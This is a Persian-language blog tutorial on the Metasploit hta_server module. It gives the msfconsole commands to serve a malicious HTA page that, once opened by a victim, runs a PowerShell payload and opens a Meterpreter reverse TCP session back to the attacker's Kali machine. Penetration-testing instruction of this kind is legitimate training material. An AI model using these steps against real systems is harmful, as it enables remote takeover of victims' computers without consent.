ماژول hta_server متاسپلوییت

منتشر شده در دسته : بلاگ, متااسپلوییت پیشرفته

ماژول hta_server در متاسپلوییت یک اپلیکیشن HTA) HTML) را میزبانی کرده که پس از بازشدن سرور یک پیلود را از طریق پاورشل اجرا می کند. زمانیکه یک فایل عادی html اجرا می شود, اجرای آن محدود به مدل امنیتی مرورگر است در صورتیکه یک فایل hta یک اپلیکیشن کاملا مطمئن است و مجوزهایی بیش از یک فایل html را دارد. در این آزمایش نحوه بکارگیری یک سیستم ویندوزی با استفاده از وب سرور hta را در ابزار متاسپلوییت آموزش می دهیم.

ابتدا کنسول متاسپلوییت را باز کنید :

service postgresql start
msfconsole

ماژول hta_server - ماژول hta_server متاسپلوییت - ماژول نفوذ hta_server

به جستجوی ماژول hta_server بپردازید

search hta_server

ماژول hta_server - ماژول hta_server متاسپلوییت - ماژول نفوذ hta_server

ماژول اکسپلوییت را انتخاب کنید و یک پیلود برای آن انتخاب کنید. سپس گزینه های موجود را نمایش دهید :

use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_tcp
show options

ماژول hta_server - ماژول hta_server متاسپلوییت - ماژول نفوذ hta_server

گزینه های LHOST , SRVHOST را بر روی آیپی سیستم کالی لینوکس و یک پورت دلخواه تنظیم کنید. در نهایت دستور exploit را وارد کنید تا یک سرور hta با آدرسی تصادفی ایجاد شود.

ماژول hta_server - ماژول hta_server متاسپلوییت - ماژول نفوذ hta_server

اکنون کافی است تا این آدرس از طریق سیستم قربانی مرور شود

ماژول hta_server - ماژول hta_server متاسپلوییت - ماژول نفوذ hta_server

تا یک نشست فعال ایجاد شود

ماژول hta_server - ماژول hta_server متاسپلوییت - ماژول نفوذ hta_server